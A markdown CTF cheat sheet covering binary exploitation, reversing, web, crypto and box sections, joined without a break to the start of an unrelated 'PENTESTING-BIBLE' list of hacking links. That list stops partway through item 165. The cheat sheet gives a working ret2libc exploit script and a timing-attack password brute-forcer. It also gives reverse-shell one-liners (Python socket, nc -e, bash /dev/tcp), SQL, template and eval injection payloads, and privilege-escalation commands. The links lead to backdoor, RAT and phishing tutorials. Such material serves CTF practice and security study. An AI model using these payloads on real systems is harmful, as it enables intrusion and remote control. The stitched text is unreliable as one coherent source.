[https://www.youtube.com/watch?v=FvQYGAM1X9U&ab_channel=NPTEL-NOCIITM](https://www.youtube.com/watch?v=FvQYGAM1X9U&ab_channel=NPTEL-NOCIITM) - Good example (go to 3:22:44): - [https://www.youtube.com/watch?v=uIkxsBgkpj8&t=13257s&ab_channel=freeCodeCamp.org](https://www.youtube.com/watch?v=uIkxsBgkpj8&t=13257s&ab_channel=freeCodeCamp.org) - [https://www.youtube.com/watch?v=NCLUm8geskU&ab_channel=BenGreenberg](https://www.youtube.com/watch?v=NCLUm8geskU&ab_channel=BenGreenberg) - Get address for execve("/bin/sh") - `one_gadget <libc file>` - If you already know the libc file and a location (ie. dont have to leak them...) ```python #!/bin/python3 from pwn import * import os binaryName = 'ret2libc1' # get the address of libc file with ldd libc_loc = os.popen(f'ldd {binaryName}').read().split('\n')[1].strip().split()[2] # use one_gadget to see where execve is in that libc file one_gadget_libc_execve_out = [int(i.split()[0], 16) for i in os.popen(f'one_gadget {libc_loc}').read().split("\n") if "execve" in i] # pick one of the suitable addresses libc_execve_address = one_gadget_libc_execve_out[1] p = process(f'./{binaryName}') e = ELF(f'./{binaryName}') l = ELF(libc_loc) # get the address of printf from the binary output printf_loc = int(p.recvuntil('\n').rstrip(), 16) # get the address of printf from libc printf_libc = l.sym['printf'] # calculate the base address of libc libc_base_address = printf_loc - printf_libc # generate payload # 0x17 is from gdb analysis of offset from input to return address offset = 0x17 payload = b"A"*offset payload += p64(libc_base_address + libc_execve_address) # send the payload p.sendline(payload) # enter in interactive so we can use the shell created from our execve payload p.interactive() ``` ## Reverse Engineering > Cool Guide: [https://opensource.com/article/20/4/linux-binary-analysis](https://opensource.com/article/20/4/linux-binary-analysis) > - [Ghidra](https://ghidra-sre.org/) - Very useful decompiler - dotPeek or dnSpy - decompile .NET executables - [jadx](https://github.com/skylot/jadx) and jadx-gui - decompile apks - [devtoolzone](https://devtoolzone.com/decompiler/java) - decompile java online - [Quiltflower](https://github.com/QuiltMC/quiltflower/) - Advanced terminal-based java decompiler - apktool - decompile apks - `apktool d *.apk` - [gdb](https://www.gnu.org/software/gdb/) - Binary analysis - [peda](https://github.com/longld/peda) (extension for increased functionality) - [gef](https://github.com/hugsy/gef) (gdb extension for pwners) - [radare2](https://github.com/radareorg/radare2) - Binary analysis - [FLOSS](https://github.com/mandiant/flare-floss) - `strings` on steroids. Uses static analysis to find and calculate strings #### SMT Solvers - [angr](https://github.com/angr/angr) (python) - [Docs](https://docs.angr.io/core-concepts/toplevel) - [Tutorial](.resources/SMT_Solvers.md#2-angr) - [z3](https://github.com/Z3Prover/z3) - [Tutorial](.resources/SMT_Solvers.md#1-z3) #### Reversing byte-by-byte checks (side-channel attack) [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) - Here's a version I made for a challenge that uses a time-based attack: - You might have to run it a couple times just to account for randomness ```python3 #!/bin/python3 from pwn import * import string keyLen = 8 binaryName = 'binary' context.log_level = 'error' s = '' print("*"*keyLen) for chars in range(keyLen): a = [] for i in string.printable: p = process(f'perf stat -x, -e cpu-clock ./{binaryName}'.split()) p.readline() currPass = s + i + '0'*(keyLen - chars - 1) # print(currPass) p.sendline(currPass.encode()) p.readline() p.readline() p.readline() info = p.readall().split(b',')[0] p.close() try: a.append((float(info), i)) except: pass # print(float(info), i) a.sort(key = lambda x: x[0]) s += str(a[-1][1]) print(s + "*"*(keyLen - len(s))) # print(sorted(a, key = lambda x: x[0])) p = process(f'./{binaryName}') p.sendline(s.encode()) p.interactive() ``` #### Searching strings with gef - If your flag is being read into a variable or register at any point, you can break after it is moved and run `grep <string>` and gef will automatically show you the string that matches your search pattern ## Web - [Nikto](https://tools.kali.org/information-gathering/nikto) (if allowed) - automatically looks for vulnerabilities - [gobuster](https://tools.kali.org/web-applications/gobuster) (if allowed) - Brute forces directories and files - [hydra](https://tools.kali.org/password-attacks/hydra) (if allowed) - Brute forces logins for various services - [BurpSuite](https://portswigger.net/burp) - Intercepts web requests and allows you to modify them - [Wireshark](https://www.wireshark.org/) - Analyze live network traffic and pcap files - [php reverse shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) - Useful for websites that allow you to upload files - This file needs to be executed on the server to work - [WPScan](http://wpscan.com) - Scan wordpress websites - Use `wpscan --url <site> --plugins-detection mixed -e` with an api key for best results - [jwt](https://jwt.io/) - You can identify a JWT token since base64-encoded json (and thus jwt tokens) begins with "ey" - This site will decode JSON web tokens - You can crack the secret for the JSON web token to modify and sign your own tokens - `echo <token> > jwt.txt` - `john jwt.txt` - SQL injection - sqlmap - `sqlmap --forms --dump-all -u <url>` - Automates the process of SQL injection - Basic SQL injection - Enter `'OR 1=1--` in login form - On the server this will evaluate to `SELECT * FROM Users WHERE User = '' OR 1=1--' AND Pass = ''` - `1=1` evaluates to true, which satisfies the `OR` statement, and the rest of the query is commented out by the `--` - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) - Great resource for web exploitation with lots of payloads - Template Injection - [tplmap](https://github.com/epinna/tplmap) - Automated server-side template injection - Jinja Injection - {{ config.items() }} - Flask Injection - {{config}} - Python eval() function - `__import__.('subprocess').getoutput('<command>')` - make sure to switch the parentheses if it doesn't work - `__import__.('subprocess').getoutput('ls').split('\\n')` - list files in system - [More python injection](https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1) - Cross Site Scripting - [CSP Evaluator](https://csp-evaluator.withgoogle.com/) - Google's Content Security Policy Evaluator ### Fuzzing input fields - FFUF - Copy the request to the input field and replace the parameter with "FUZZ": - `ffuf -request input.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc all` - Use `-fs` to filter sizes ## Crypto ### CyberChef - [CyberChef](https://gchq.github.io/CyberChef/) - Carries out various cryptography operations [Cipher Detector](https://www.boxentriq.com/code-breaking/cipher-identifier)!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ### Hashes - hashid - Command-line utility to detect the hash type ### Common Ciphers - [Caesars Cipher](https://www.dcode.fr/caesar-cipher) - [Vigenere Cipher](https://www.dcode.fr/vigenere-cipher) ```python #### Solver using custom table cipherText = "" plainText = "" flagCipherText = "" tableFile = "" with open(cipherText) as fin: cipher = fin.readline().rstrip() with open(plainText) as fin: plain = fin.readline().rstrip() with open(flagCipherText) as fin: flag = fin.readline().rstrip() with open(tableFile) as fin: table = [i.rstrip().split() for i in fin.readlines()] table[0].insert(0, "") # might have to modify this part. # just a 2d array with the lookup table # should still work if the table is slightly off, but the key will be wrong key = "" for i, c in enumerate(plain[0:100]): col = table[0].index(c) for row in range(len(table)): if table[row][col] == cipher[i]: key += table[row][0] break print(key) dec_flag = "" for i, c in enumerate(flag[:-1]): col = table[0].index(key[i]) for row in range(len(table)): if table[row][col] == flag[i]: dec_flag += table[row][0] break print(dec_flag) ``` - [Substitution Cipher](https://www.quipqiup.com/) - [Rot13](https://rot13.com/) - [Keyed Caesars cipher](https://www.boxentriq.com/code-breaking/keyed-caesar-cipher) ### RSA #### Grab RSA Info with pycryptodome ```python from Crypto.PublicKey import RSA keyName = "example.pem" with open(keyName,'r') as f: key = RSA.import_key(f.read()) print(key) # You can also get individual parts of the RSA key # (sometimes not all of these) print(key.p) print(key.q) print(key.n) print(key.e) print(key.d) print(key.u) # public keys have n and e ``` #### Chinese Remainder Theorem (p,q,e,c) - Use this when you can factor the number `n` - Bad implementations will have more than one prime factor - [Proof](https://www.di-mgt.com.au/crt_rsa.html) - Old ```python def egcd(a, b): if a == 0: return (b, 0, 1) g, y, x = egcd(b%a,a) return (g, x - (b//a) * y, y) def modinv(a, m): g, x, y = egcd(a, m) if g != 1: raise Exception('No modular inverse') return x%m p = q = e = c = n = p*q # use factordb command or website to find factors phi = (p-1)*(q-1) # phi is simply the product of (factor_1-1) * ... * (factor_n -1) d = modinv(e, phi) # private key # print(d) m = pow(c,d,n) # decrypted plaintext message in long integer form thing = hex(m)[2:] # ascii without extra stuff at the start (0x) print(bytes.fromhex(thing).decode('ascii')) ``` - New ```python #!/bin/python3 from Crypto.Util.number import * from factordb.factordb import FactorDB # ints: n = e = c = f = FactorDB(n) f.connect() factors = f.get_factor_list() phi = 1 for i in factors: phi *= (i-1) d = inverse(e, phi) m = pow(c, d, n) flag = long_to_bytes(m).decode('UTF-8') print(flag) ``` - Website that gives factors and euler's totient (phi) - [https://www.alpertron.com.ar/ECM.HTM](https://www.alpertron.com.ar/ECM.HTM) #### Coppersmith attack (c,e) - Usually used if the exponent is very small (e <= 5) - [Proof](https://web.eecs.umich.edu/~cpeikert/lic13/lec04.pdf) ```python3 from Crypto.Util.number import * def nth_root(radicand, index): lo = 1 hi = radicand while hi - lo > 1: mid = (lo + hi) // 2 if mid ** index > radicand: hi = mid else: lo = mid if lo ** index == radicand: return lo elif hi ** index == radicand: return hi else: return -1 c = e = plaintext = long_to_bytes(nth_root(c, e)) print(plaintext.decode("UTF-8")) ``` #### Pollards attack (n,e,c) - Based on [Pollard's factorization method](http://www.math.columbia.edu/~goldfeld/PollardAttack.pdf), which makes products of primes [easy to factor](https://people.csail.mit.edu/rivest/pubs/RS01.version-1999-11-22.pdf) if they are (B)smooth - This is the case if `p-1 | B!` and `q - 1` has a factor > `B` ```python3 from Crypto.Util.number import * from math import gcd n = c = e = def pollard(n): a = 2 b = 2 while True: a = pow(a,b,n) d = gcd(a-1,n) if 1 < d < n: return d b += 1 p = pollard(n) q = n // p phi = 1 for i in [p,q]: phi *= (i-1) d = inverse(e, phi) m = pow(c, d, n) flag = long_to_bytes(m).decode('UTF-8') print(flag) ``` #### Wiener Attack (n,e,c) - For use when d is too small (or e is too big) - Using [this](https://github.com/orisano/owiener) python module - [Proof](https://sagi.io/crypto-classics-wieners-rsa-attack/) ```python3 from Crypto.Util.number import * import owiener n = e = c = d = owiener.attack(e, n) m = pow(c, d, n) flag = long_to_bytes(m) print(flag) ``` ### Base16, 32, 36, 58, 64, 85, 91, 92 [https://github.com/mufeedvh/basecrack](https://github.com/mufeedvh/basecrack) ## Box ### Connecting - ssh - `ssh <username>@<ip>` - `ssh <username>@<ip> -i <private key file>` - Mount SSH in as a file system locally: - `sshfs -p <port> <user>@<ip>: <mount_directory>` - Known hosts - `ssh-copy-id -i ~/.ssh/id_rsa.pub <user@host>` - netcat - `nc <ip> <port>` ### Enumeration - Machine discovery - `netdiscover` - Machine port scanning - `nmap -sC -sV <ip>` - Linux enumeration - `enum4linux <ip>` - SMB enumeration - `smbmap -H <ip>` - Connect to SMB share - `smbclient //<ip>/<share>` ### Privilege escalation - [linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - `./linpeas.sh` - Automatically looks for privilege escalation vectors - List commands we can run as root - `sudo -l` - Find files with the SUID permission - `find / -perm -u=s -type f 2>/dev/null` - These files execute with the privileges of the owner instead of the user executing them - Find permissions for all services - `accesschk.exe -uwcqv *` - Look for services that are not under the System or Administrator accounts - Query Service - `sc qc <service name>` - Only works in cmd.exe ### Listen for reverse shell - `nc -lnvp <port>` ### Reverse shell - revshells.com - templates for basically everything you might need - `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` - `nc -e /bin/sh <ip> <port>` - `bash -i >& /dev/tcp/<ip>/<port> 0>&1` ### Get interactive shell #### Linux 1. Run the following python command to make it partially interactive: `python -c 'import pty;pty.spawn("/bin/bash");'` 2. Exit the netcat session with `CTRL+Z` and run `stty raw -echo` locally 3. Reenter your session with the command `fg` (and the job id afterward if needed) 4. Change your terminal emulator to xterm by running `export TERM=xterm` (this might not be necessary) 5. Change your shell to bash by running `export SHELL=bash` (this might not be necessary) 6. Done! Now your shell should be fully interactive #### Windows / General 1. Install `rlwrap` on your system 2. Now, every time you run a nc listener, just put `rlwrap` in front 3. For example: `rlwrap nc -lvnp 1337` * This will give you arrow keys and command history, but won't give autocompletion (as far as I can tell) for windows and *nix systems ## OSINT - [pimeyes](https://pimeyes.com/en) - Reverse search faces on the internet - [OSINT Framework](https://osintframework.com/) - Website that aggregates tons of OSINT tools. ## Misc - Resolving DNS Errors - `dig <site> <recordType>` - [List of record types](https://en.wikipedia.org/wiki/List_of_DNS_record_types) - Make sure you try TXT - Run a binary as a different architecture - 64 bit: - `linux64 ./<binary>` - 32 bit: - `linux32 ./<binary>` - Extract MS Macros: - [https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php](https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php) - View CNC GCode - [https://ncviewer.com/](https://ncviewer.com/) # Notes * TOC generated with [ecotrust-canada](https://github.com/jonschlinkert/markdown-toc)
# PENTESTING-BIBLE # hundreds of ethical hacking &amp; penetration testing &amp; red team &amp; cyber security &amp; computer science resources. # ALMOST 2000 LINKS. # ALMOST 2000 PDF FILES ABOUT DIFFERENT FIELDS OF HACKING . # note:most of the pdf files is different than the links which means there is now almost 4000 links & pdf files. ## Support. **Donate via Paypal:** *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty: www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/ -4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection: https://medium.com/p/2e143eb36941 -5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality: https://medium.com/p/a11bb5f863b3/share/twitter -6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company: https://medium.com/p/a69afe5a0899 -7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation: https://medium.com/p/b29355a8e68e -9-Recon — my way: https://medium.com/p/82b7e5f62e21 -10-Reconnaissance: a eulogy in three acts: https://medium.com/p/7840824b9ef2 -11-Red-Teaming-Toolkit: https://github.com/infosecn1nja/Red-Teaming-Toolkit -12-Red Team Tips: https://vincentyiu.co.uk/ -13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL: https://modexp.wordpress.com/2019/04/24/glibc-shellcode/ -14-Shellcode: Encrypting traffic: https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/ -15-Penetration Testing of an FTP Server: https://medium.com/p/19afe538be4b -16-Reverse Engineering of the Anubis Malware — Part 1: https://medium.com/p/741e12f5a6bd -17-Privilege Escalation on Linux with Live examples: https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ -18-Pentesting Cheatsheets: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -19-Powershell Payload Delivery via DNS using Invoke-PowerCloud: https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud -20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS: https://sguru.org/ghdb-download-list-4500-google-dorks-free/ -21-SQL Injection Cheat Sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -22-SQLmap’s os-shell + Backdooring website with Weevely: https://medium.com/p/8cb6dcf17fa4 -23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips: https://medium.com/p/c5a3f5764cb3 -24-Top 10 Essential NMAP Scripts for Web App Hacking: https://medium.com/p/c7829ff5ab7 -25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!: https://medium.com/p/52cf5c5640a1 -26-Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -27-XSS Payloads, getting past alert(1): https://medium.com/p/217ab6c6ead7 -28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical: https://medium.com/p/50d8135b7549 -29-Web Application Firewall (WAF) Evasion Techniques: https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques -30-OSINT Resources for 2019: https://medium.com/p/b15d55187c3f -31-The OSINT Toolkit: https://medium.com/p/3b9233d1cdf9 -32-OSINT : Chasing Malware + C&C Servers: https://medium.com/p/3c893dc1e8cb -33-OSINT tool for visualizing relationships between domains, IPs and email addresses: https://medium.com/p/94377aa1f20a -34-From OSINT to Internal – Gaining Access from outside the perimeter: https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter -35-Week in OSINT #2018–35: https://medium.com/p/b2ab1765157b -36-Week in OSINT #2019–14: https://medium.com/p/df83f5b334b4 -37-Instagram OSINT | What A Nice Picture: https://medium.com/p/8f4c7edfbcc6 -38-awesome-osint: https://github.com/jivoi/awesome-osint -39-OSINT_Team_Links: https://github.com/IVMachiavelli/OSINT_Team_Links -40-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -41-Hacking Cryptocurrency Miners with OSINT Techniques: https://medium.com/p/677bbb3e0157 -42-A penetration tester’s guide to sub- domain enumeration: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5 -43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages: https://blackarch.org/recon.html -44-What tools I use for my recon during BugBounty: https://medium.com/p/ec25f7f12e6d -45-Command and Control – DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/ -46-Command and Control – WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/ -47-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -48-Command and Control – Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/ -49-Source code disclosure via exposed .git folder: https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html -50-Pentesting Cheatsheet: https://hausec.com/pentesting-cheatsheet/ -51-Windows Userland Persistence Fundamentals: https://www.fuzzysecurity.com/tutorials/19.html -52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up: https://medium.com/p/abdc7c269dd5 -53-awesome-bug-bounty: https://github.com/djadmin/awesome-bug-bounty -54-dostoevsky-pentest-notes: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -55-awesome-pentest: https://github.com/enaqx/awesome-pentest -56-awesome-windows-exploitation: https://github.com/enddo/awesome-windows-exploitation -57-awesome-exploit-development: https://github.com/FabioBaroni/awesome-exploit-development -58-BurpSuit + SqlMap = One Love: https://medium.com/p/64451eb7b1e8 -59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat: https://medium.com/p/a5a5d3ffea46 -60-DLL Injection: https://pentestlab.blog/2017/04/04/dll-injection -61-DLL Hijacking: https://pentestlab.blog/2017/03/27/dll-hijacking -62-My Recon Process — DNS Enumeration: https://medium.com/p/d0e288f81a8a -63-Google Dorks for nding Emails, Admin users etc: https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc -64-Google Dorks List 2018: https://medium.com/p/fb70d0cbc94 -65-Hack your own NMAP with a BASH one-liner: https://medium.com/p/758352f9aece -66-UNIX / LINUX CHEAT SHEET: cheatsheetworld.com/programming/unix-linux-cheat-sheet/ -67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -68- information gathering: https://pentestlab.blog/category/information-gathering/ -69-post exploitation: https://pentestlab.blog/category/post-exploitation/ -70-privilege escalation: https://pentestlab.blog/category/privilege-escalation/ -71-red team: https://pentestlab.blog/category/red-team/ -72-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -73-Web Application Penetration Testing Cheat Sheet: https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/ -74-Windows Kernel Exploits: https://pentestlab.blog/2017/04/24/windows-kernel-exploits -75-Windows oneliners to download remote payload and execute arbitrary code: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ -76-Windows-Post-Exploitation: https://github.com/emilyanncr/Windows-Post-Exploitation -77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows: https://medium.com/p/a2ddc3557403 -78-Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html -79-Windows Privilege Escalation Guide: www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -80-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -81-Windows Exploitation Tricks: Abusing the User-Mode Debugger: https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html -82-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -83- Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking -84-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -85-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -86-Comprehensive Guide to Sqlmap (Target Options): http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2 -87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE: www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple -88-Comprehensive Guide on Gobuster Tool: https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/ -89-My Top 5 Web Hacking Tools: https://medium.com/p/e15b3c1f21e8 -90-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -91-File System Access on Webserver using Sqlmap: http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap -92-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -93-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd): http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa -95-XSS Payload List - Cross Site Scripting Vulnerability Payload List: https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html -96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection: https://www.notsosecure.com/analyzing-cve-2018-6376/ -97-Exploiting Sql Injection with Nmap and Sqlmap: http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap -98-awesome-malware-analysis: https://github.com/rshipp/awesome-malware-analysis -99-Anatomy of UAC Attacks: https://www.fuzzysecurity.com/tutorials/27.html -100-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -101-5 ways to Banner Grabbing: http://www.hackingarticles.in/5-ways-banner-grabbing -102-6 Ways to Hack PostgresSQL Login: http://www.hackingarticles.in/6-ways-to-hack-postgressql-login -103-6 Ways to Hack SSH Login Password: http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password -104-10 Free Ways to Find Someone’s Email Address: https://medium.com/p/e6f37f5fe10a -105-USING A SCF FILE TO GATHER HASHES: https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes -106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit): http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit 107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities: http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities -108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs): https://medium.com/p/ef6542301c65 -109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information: https://gbhackers.com/external-black-box-penetration-testing -110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals: https://gbhackers.com/hacking-tools-list -111-Most Important Considerations with Malware Analysis Cheats And Tools list: https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list -112-Awesome-Hacking: https://github.com/Hack-with-Github/Awesome-Hacking -113-awesome-threat-intelligence: https://github.com/hslatman/awesome-threat-intelligence -114-awesome-yara: https://github.com/InQuest/awesome-yara -115-Red-Team-Infrastructure-Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki -116-awesome-pentest: https://github.com/enaqx/awesome-pentest -117-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -118-pentest-wiki: https://github.com/nixawk/pentest-wiki -119-awesome-web-security: https://github.com/qazbnm456/awesome-web-security -120-Infosec_Reference: https://github.com/rmusser01/Infosec_Reference -121-awesome-iocs: https://github.com/sroberts/awesome-iocs -122-blackhat-arsenal-tools: https://github.com/toolswatch/blackhat-arsenal-tools -123-awesome-social-engineering: https://github.com/v2-dev/awesome-social-engineering -124-Penetration Testing Framework 0.59: www.vulnerabilityassessment.co.uk/Penetration%20Test.html -125-Penetration Testing Tools Cheat Sheet : https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ -126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool: https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool -127-Spear Phishing 101: https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html -128-100 ways to discover (part 1): https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/ -129-Comprehensive Guide to SSH Tunnelling: http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/ -130-Capture VNC Session of Remote PC using SetToolkit: http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/ -131-Hack Remote PC using PSEXEC Injection in SET Toolkit: http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/ -132-Denial of Service Attack on Network PC using SET Toolkit: http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/ -133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit: http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/ -134-Hack Any Android Phone with DroidJack (Beginner’s Guide): http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/ -135-HTTP RAT Tutorial for Beginners: http://www.hackingarticles.in/http-rat-tutorial-beginners/ -136-5 ways to Create Permanent Backdoor in Remote PC: http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/ -137-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -138-EMPIRE TIPS AND TRICKS: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ -139-CSRF account takeover Explained Automated/Manual: https://medium.com/p/447e4b96485b -140-CSRF Exploitation using XSS: http://www.hackingarticles.in/csrf-exploitation-using-xss -141-Dumping Domain Password Hashes: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough: https://bneg.io/2017/05/24/empire-post-exploitation/ -143-Dropbox for the Empire: https://bneg.io/2017/05/13/dropbox-for-the-empire/ -144-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION: https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/ -146-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ -148-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -149-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ -151-enum4linux Cheat Sheet: https://highon.coffee/blog/enum4linux-cheat-sheet/ -152-enumeration: https://technologyredefine.blogspot.com/2017/11/enumeration.html -153-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -154-Command and Control – WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -156-Comprehensive Guide to Nmap Port Status: http://www.hackingarticles.in/comprehensive-guide-nmap-port-status -157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -158-Compromising Jenkins and extracting credentials: https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/ -159-footprinting: https://technologyredefine.blogspot.com/2017/09/footprinting_17.html -160-awesome-industrial-control-system-security: https://github.com/hslatman/awesome-industrial-control-system-security -161-xss-payload-list: https://github.com/ismailtasdelen/xss-payload-list -162-awesome-vehicle-security: https://github.com/jaredthecoder/awesome-vehicle-security -163-awesome-osint: https://github.com/jivoi/awesome-osint -164-awesome-python: https://github.com/vinta/awesome-python -165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit): 